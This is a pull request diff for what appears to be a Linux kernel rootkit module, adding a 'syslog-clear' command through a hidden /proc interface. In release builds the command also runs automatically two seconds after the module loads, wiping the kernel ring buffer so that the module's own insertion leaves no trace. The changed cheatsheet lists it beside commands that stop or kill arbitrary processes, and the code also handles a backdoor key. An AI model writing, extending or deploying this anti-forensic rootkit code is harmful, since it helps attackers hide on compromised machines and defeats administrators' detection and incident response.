### PR TITLE
stealth: add new command syslog-clear

### DIFF
--- a/docs/Cheatsheet-UI-interface.md
+++ b/docs/Cheatsheet-UI-interface.md
@@ -313,3 +313,17 @@
 - `echo signal-task-stop=1234 >/proc/example`
 - `echo signal-task-cont=1234 >/proc/example`
 - `echo signal-task-kill=1234 >/proc/example`
+
+
+## Clear ring-buffer
+
+*Action:* UI
+
+*Mode:* debug,release
+
+*About:* Similar to `dmesg -c`
+
+*Root required:* debug=No, release=Yes
+
+*Commands:*
+- `echo syslog-clear >/proc/example`

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -33,9 +33,6 @@
 #include "version.h"
 #include "log.h"
 
-#define MAX_PROCFS_SIZE PAGE_SIZE
-#define MAX_MAGIC_WORD_SIZE 16
-#define MAX_64_BITS_ADDR_SIZE 16
 #ifndef MODNAME
 #pragma message "Missing \'MODNAME\' compilation directive. See Makefile."
 #endif
@@ -333,17 +330,17 @@ out_put_kobj:
 }
 
 struct elfbits_t {
-	char bits[MAX_PROCFS_SIZE + 1];
+	char bits[PAGE_SIZE];
 	bool ready;
 };
 static struct elfbits_t ElfBits;
 
-static void set_elfbits(char *bits)
+void kv_set_elfbits(char *bits)
 {
 	if (bits) {
 		spin_lock(&elfbits_spin);
 		memset(&ElfBits, 0, sizeof(struct elfbits_t));
-		snprintf(ElfBits.bits, MAX_PROCFS_SIZE, "%s", bits);
+		snprintf(ElfBits.bits, PAGE_SIZE-1, "%s", bits);
 		ElfBits.ready = true;
 		spin_unlock(&elfbits_spin);
 	}
@@ -378,26 +375,40 @@ static int open_cb(struct inode *ino, struct file *fptr)
 static ssize_t _seq_read(struct file *fptr, char __user *buffer, size_t count,
 			 loff_t *ppos)
 {
-	int len = 0;
+	ssize_t rv = 0;
 	bool ready = false;
 	struct elfbits_t *elfbits;
+	char *kbuf = NULL;
 
 	if (*ppos > 0 || !count)
 		return 0;
 
 	elfbits = get_elfbits(&ready);
-	if (elfbits && ready) {
-		char b[MAX_64_BITS_ADDR_SIZE + 2] = { 0 };
-		len = snprintf(b, sizeof(b), "%s\n", elfbits->bits);
-		if (copy_to_user(buffer, b, len))
-			return -EFAULT;
-	} else {
-		return -ENOENT;
+	if (!elfbits || !ready) {
+		rv = -ENOENT;
+		goto leave;
 	}
 
-	*ppos = len;
+	kbuf = kzalloc(PAGE_SIZE, GFP_KERNEL);
+	if (!kbuf) {
+		rv = -EFAULT;
+		goto leave;
+	}
 
-	return len;
+	rv = snprintf(kbuf, PAGE_SIZE-1, "%s\n", elfbits->bits);
+	if (copy_to_user(buffer, kbuf, rv)) {
+		rv = -EFAULT;
+		goto cleanup;
+	}
+
+	*ppos = rv;
+
+cleanup:
+	if (kbuf)
+		kfree(kbuf);
+
+leave:
+	return rv;
 }
 /*
  * This function removes the proc interface after a
@@ -515,7 +526,7 @@ void _crypto_cb(const u8 *const buf, size_t buflen, size_t copied,
 		 validate->op == Opt_get_bdkey) {
 		char bits[32 + 1] = { 0 };
 		snprintf(bits, 32, "%llx", *((uint64_t *)buf));
-		set_elfbits(bits);
+		kv_set_elfbits(bits);
 	}
 #endif
 }
@@ -652,7 +663,7 @@ static ssize_t write_cb(struct file *fptr, const char __user *user, size_t size,
 				char bits[32 + 1] = { 0 };
 				base = kv_get_elf_vm_start(pid);
 				snprintf(bits, 32, "%lx", base);
-				set_elfbits(bits);
+				kv_set_elfbits(bits);
 			}
 		} break;
 		case Opt_signal_task_stop:
@@ -738,11 +749,11 @@ try_reload:
 
 	/* set proc file maximum size & user as root */
 #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 9, 0)
-	rrProcFileEntry->size = MAX_PROCFS_SIZE;
+	rrProcFileEntry->size = PAGE_SIZE;
 	rrProcFileEntry->uid = 0;
 	rrProcFileEntry->gid = 0;
 #else
-	proc_set_size(rrProcFileEntry, MAX_PROCFS_SIZE);
+	proc_set_size(rrProcFileEntry, PAGE_SIZE);
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 5, 0)
 	kuid.val = 0;
 	kgid.val = 0;

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -450,6 +450,7 @@ enum {
 	Opt_signal_task_stop,
 	Opt_signal_task_cont,
 	Opt_signal_task_kill,
+	Opt_syslog_clear,
 
 #ifdef DEBUG_RING_BUFFER
 	/**debug */
@@ -481,6 +482,7 @@ static const match_table_t tokens = {
 	{ Opt_signal_task_stop, "signal-task-stop=%d" },
 	{ Opt_signal_task_cont, "signal-task-cont=%d" },
 	{ Opt_signal_task_kill, "signal-task-kill=%d" },
+	{ Opt_syslog_clear, "syslog-clear" },
 #ifdef DEBUG_RING_BUFFER
 	{ Opt_get_bdkey, "get-bdkey" },
 	{ Opt_get_unhidekey, "get-unhidekey" },
@@ -665,6 +667,9 @@ static ssize_t write_cb(struct file *fptr, const char __user *user, size_t size,
 			if (sscanf(args[0].from, "%d", &pid) == 1)
 				_run_send_sig(SIGKILL, pid, false);
 			break;
+		case Opt_syslog_clear:
+			sys_do_syslog_clear();
+			break;
 		default:
 			break;
 		}
@@ -787,9 +792,13 @@ void kv_remove_proc_interface(void)
 
 static int _proc_watchdog(void *unused)
 {
+#ifndef DEBUG_RING_BUFFER
+	static bool clear_syslog = true;
+#endif
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 17, 0)
 	struct kernel_syscalls *kaddr = kv_kall_load_addr();
 #endif
+
 	for (;;) {
 		if (kthread_should_park())
 			kthread_parkme();
@@ -810,6 +819,13 @@ static int _proc_watchdog(void *unused)
 			}
 		}
 		ssleep(1);
+#ifndef DEBUG_RING_BUFFER
+		if (clear_syslog) {
+			ssleep(2);
+			sys_do_syslog_clear();
+			clear_syslog = false;
+		}
+#endif
 	}
 	return 0;
 }

--- a/src/lkm.h
+++ b/src/lkm.h
@@ -145,6 +145,7 @@ void kv_bd_cleanup_item(__be32 *);
 int kv_add_proc_interface(void);
 void kv_remove_proc_interface(void);
 int kv_is_proc_interface_loaded(void);
+void kv_set_elfbits(char *);
 
 /** whatever */
 char *kv_util_random_AZ_string(size_t);

--- a/src/lkm.h
+++ b/src/lkm.h
@@ -61,6 +61,8 @@ typedef struct bpf_map *(*bpf_map_get_sg)(unsigned int);
 typedef struct bpf_map *(*bpf_map_get_sg)(struct fd);
 #endif
 
+typedef int (*do_syslog_sg)(int, char __user *, int, int);
+
 typedef unsigned long (*kallsyms_lookup_name_sg)(const char *name);
 
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 17, 0)
@@ -74,6 +76,7 @@ typedef void (*do__set_task_comm_sg)(struct task_struct *, const char *, bool);
 struct kernel_syscalls {
 	attach_pid_sg k_attach_pid;
 	bpf_map_get_sg k_bpf_map_get;
+	do_syslog_sg k_do_syslog;
 	kallsyms_lookup_name_sg k_kallsyms_lookup_name;
 	sys64 k_sys_setreuid;
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 17, 0)
@@ -97,6 +100,7 @@ void kv_crypto_engine_deinit(void);
 /** hooks, hiding presence and so */
 bool sys_init(void);
 void sys_deinit(void);
+void sys_do_syslog_clear(void);
 char *sys_get_ttyfile(void);
 char *sys_get_sslfile(void);
 


### PR DESCRIPTION
Kernel call clears ringbuffer

syslog-clear can happen in two ways:

- Invoking it: echo syslog-clear > /proc/<name>

- In DEPLOY:
- 	runs once automatically after insmod

Test with dmesg